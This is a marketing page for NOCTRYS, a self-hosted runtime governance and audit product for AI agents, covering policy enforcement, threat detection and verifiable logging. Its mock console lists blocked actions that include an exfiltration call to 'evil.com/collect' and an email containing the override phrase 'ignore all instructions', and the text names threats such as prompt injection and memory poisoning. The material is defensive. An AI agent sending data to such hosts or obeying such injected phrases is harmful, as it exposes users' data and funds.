Platform

Govern every agent action, and prove you did.

NOCTRYS sits inline between your agents and the tools they can touch. It judges each action against your policy, blocks the dangerous ones, watches for malicious behavior no static rule can catch, and seals every decision into an independently-verifiable record — deterministically, self-hosted, at roughly sixteen microseconds per action.

Live governance

Every action — judged, verdicted, and sealed.

NOCTRYS · COMPLIANCE CONSOLE LIVE
14,208
Actions governed
37
Blocked
14,171
Verified
db.read invoices#a7f3…ALLOW
payments.transfer vendor · €500#f2e0…ALLOW
db.read customers#77b5…ALLOW
http.post evil.com/collectEGRESSBLOCK
email.send "ignore all instructions…"INJECTIONBLOCK
payments.transfer mule · €9000SPEND-CAPBLOCK
audit sealed · verified on AERE · root ef3f…0d39
Standards & frameworks

Built to the standards enterprises are measured against.

NOCTRYS maps its controls to the regulations and frameworks your auditors, regulators, and security teams use to judge you — so an agent deployment can clear review, not stall in it. We are early-stage and onboarding design partners: these are engineering mappings and alignments, not certifications.

EU AI Actmaps to Art. 12 / 14 / 15 / 26
OWASP Agentic Top 10covers 10 / 10
NIST AI RMFaligned · Govern · Map · Measure · Manage
NSA MCP guidancealigned · hardened tool mediation
ISO/IEC 42001aligned · AI management system

The problem NOCTRYS solves

A chatbot returns text. An agent acts: it moves money, reads your customer tables, calls tools, and delegates to other agents — on its own, over untrusted input. The entire industry has rushed to prove who an agent is (identity) and to filter what it says (model guardrails). Almost no one governs what it does at runtime, and no one lets you prove it to a third party.

That gap is where the real damage lives: a prompt-injected agent wiring funds, a compromised tool exfiltrating a customer database, an over-delegated sub-agent escalating its own privileges. NOCTRYS closes it by governing the action plane — the point where intent becomes consequence — and by turning "trust us" into "verify it yourself."

How it works

Every consequential action an agent takes flows through the NOCTRYS interceptor before it runs. The interceptor is deterministic (no AI model in the decision path, so verdicts are reproducible), fail-closed (malformed or unknown actions are blocked, never forwarded), and self-hosted (it runs in your infrastructure and never transmits your data).

SELF-HOSTED · YOUR INFRASTRUCTURE 32-byte hash → AERE anchor AGENT(S) tool / MCP calls NOCTRYS INTERCEPTOR GOVERN allowlist · caps · approval · egress DETECT exfil · injection · drift · IFC PROVE hash-chain · anchor · cosign TOOLS · APIs money · data · MCP deterministic · fail-closed · no model in the enforcement path · only allowed calls pass
Every consequential action passes the interceptor before it runs — inside your boundary.

Three layers

01 · GOVERN

Deterministic policy

Least-privilege rules on every action — allowlist, argument & output schema, spend caps, rate limits, egress control, path/sequence policies, delegation limits, signed human approval, signed payment mandates. No model in the enforcement path. Explore Govern →

02 · DETECT

Behavior the rules miss

Two individually-allowed actions can still be an attack. NOCTRYS watches sequences, provenance, and per-agent baselines: exfiltration, prompt & indirect injection, information-flow, drift, memory poisoning, tool rug-pull, tool-shadowing. Explore Detect →

03 · PROVE

Proof, not promises

A hash-chained ledger anchored on the AERE chain and cosigned by independent witnesses, a public verifier anyone can use, execution receipts, assurance levels, and a collective-defense network. Explore Prove →

Every control, in one place

CategoryControls
Least privilegeallowlist · argument schema · output schema · spend caps · rate limits
High-risk gatingsigned human approval · signed payment mandates (AP2) · approval thresholds
Data & egressegress/destination control · information-flow control · content-usage (AIPREF) · log redaction
Sequences & delegationpath/sequence policies · delegation depth/cycle/attenuation
Behavioral detectionexfiltration · prompt & indirect injection · drift · memory poisoning · probing/velocity
Supply chaintool-drift (rug-pull) · tool-shadowing · Unicode/ASCII-smuggling guard · canary tripwires
IdentityEd25519 SVID · signed A2A messages · Web Bot Auth egress signing
Proof & accountabilitytamper-evident log · AERE anchor · witness cosigning · public verifier · execution receipts · assurance levels · collective defense · compliance report
The differentiator

Everyone can log an action. Whom must you trust to believe it?

Gating and logging the action plane is now the whole field’s direction. The distinction that decides a regulated deployment is narrower: a trusted record still asks you to trust the vendor’s PKI, the vendor’s cloud, or the operator’s own logs. NOCTRYS produces provable proof that stands even if both the vendor and the operator are assumed hostile.

When a regulator asks "prove it"…NOCTRYSVendor PKI / attestationOperator-controlled logsCloud-managed governor
Enforcement planeAction plane — the tool-call boundaryIdentity & PKI trustEndpoint / cognitionAction plane (managed)
Policy originDeterministic, hand-authored — no model in the pathVendor-managedOften LLM-authored (probabilistic)Deterministic, but decided in the vendor's cloud
DeploymentSelf-hosted — only a 32-byte hash leavesVendor serviceVendor sensor + KBCloud / managed
Audit & proofHash-chain + AERE anchor + witness mesh + public verifier"Cryptographically verifiable" — but vendor PKIAttribution trail; no anchoringManaged logs; no neutral audit layer
Non-equivocable?Yes — can't tell two auditors two storiesNoNoNo
Whom must you trust?Neither vendor nor operatorThe vendor (their roots)The operator (they hold the log)The cloud vendor
Collective defenseYes — cross-deployment signature meshNoVendor KB, one-directionalNo

Comparison characterizes competitors' publicly-stated posture (OSINT), not tested behavior; column headers describe categories of approach, not single named products.

See the full comparison & how to verify every claim →

Performance & footprint

Governance runs on the critical path of every agent action, so overhead matters. It is negligible: roughly 16 microseconds per action — tens of thousands of actions per second on a single core — against the hundreds of milliseconds an LLM tool call already takes. The on-chain footprint is a single 32-byte hash of the audit log; nothing else leaves your infrastructure.

0%
attack success over a 13-attack battery
100%
benign utility preserved
~16µs
enforcement overhead per action
10/10
OWASP Agentic Top 10 covered
self-hostedfail-closedzero-dependency core63 tests greenNode · Go · Docker

Be one of our first five design partners

Free pilot. Two-week, self-hosted integration. You keep the tamper-evident audit and the AI Act compliance report.

Request a pilot →